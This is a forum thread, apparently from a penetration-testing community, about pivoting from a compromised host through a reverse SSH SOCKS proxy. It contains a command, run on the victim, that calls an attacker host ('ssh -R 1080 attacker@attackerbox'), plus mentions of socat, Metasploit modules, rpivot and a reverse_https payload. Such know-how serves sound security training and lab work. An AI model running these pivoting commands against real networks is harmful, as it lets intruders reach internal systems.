Reverse SSH tunnel from popped box?

Is this possible? I tried a few different ways to create an SSH tunnel from a popped box to an attacking box, so that I could use proxychains to tunnel traffic into the network of the popped box from the attacker machine. Think of a reverse Socks proxy.

The only way I can get this to work is if I have SSH access (a valid login and ssh set up and running) on the popped box.

Thanks.

Begin this technique is not good OPSEC

If the victim box is running an SSH client > 7.6 you can create a reverse SOCKS proxy listening on your attacker box.

  • ssh(1): add support for reverse dynamic forwarding. In this mode,
    ssh will act as a SOCKS4/5 proxy and forward connections
    to destinations requested by the remote SOCKS client. This mode
    is requested using extended syntax for the -R and RemoteForward
    options and, because it is implemented solely at the client,
    does not require the server be updated to be supported.

Simply run:

ssh -R 1080 attacker@attackerbox

Which is the exact opposite of using the -D flag you’re probably familiar with.

End this technique is not good OPSEC

You need to use valid creds for your attacker box on a victim machine for this to work. You could set up a restricted SSH user, but you are much better off dropping socat on their box and binding to a port on their machine. Don’t get hacked trying to be cute homie.
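For the "restricted SSH user" mentioned above, here is an added example (not from the thread) of a sshd_config Match block on the box that receives the reverse dynamic forward. It assumes the dedicated account is named tunnelonly and that the client connects with -N so the forced command is never triggered; everything other than the -R listener on port 1080 is denied.

```sshd_config
# Added example: least-privilege account on the SSH server side of a
# reverse dynamic forward. "tunnelonly" is an assumed account name.
Match User tunnelonly
    # Only remote (-R) forwards; local -L/-D forwards through this account are refused
    AllowTcpForwarding remote
    # The -R listener may only bind port 1080 (port-only form matches any bind address)
    PermitListen 1080
    # No shell or command: any exec/shell request runs /bin/false and the session ends
    ForceCommand /bin/false
    PermitTTY no
    # No agent, X11 or tun/tap forwarding through this account
    AllowAgentForwarding no
    X11Forwarding no
    PermitTunnel no
    # Key-only authentication; a password for this account is never accepted
    PasswordAuthentication no
    AuthenticationMethods publickey
```

Connect with `ssh -N -R 1080 tunnelonly@attackerbox`: with -N no shell is requested, so ForceCommand does not fire and only the forward is established. Reload sshd after editing and confirm with `sshd -T -C user=tunnelonly` that the Match block applies.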

@mrjunkshop said:
Is this possible? I tried a few different ways to create an SSH tunnel from a popped box to an attacking box, so that I could use proxychains to tunnel traffic into the network of the popped box from the attacker machine. Think of a reverse Socks proxy.

The only way I can get this to work is if I have SSH access (a valid login and ssh set up and running) on the popped box.

Thanks.

You actually have socks4 and socks5 auxiliary modules in msf. Or you could just route.

Thanks for the input on this. I found a utility called ‘rpivot’ that does exactly what I wanted - no metasploit or new version of ssh required.

Hi, I am stuck on the part where I need to get a reverse tunnel from the Windows host to my attack host.
I am unable to get a reverse using the reverse_https payload.
My pivot machine has a listening port 127.0.0.1:8080 and forwards to 0.0.0.0:8000, but I think this is wrong. I can't connect on 172.16.5.15:8080; it gives connection refused.
When I connect locally to 127.0.0.1:8080 it gets forwarded. How can I make it so that it listens on its internal IP instead of its loopback address?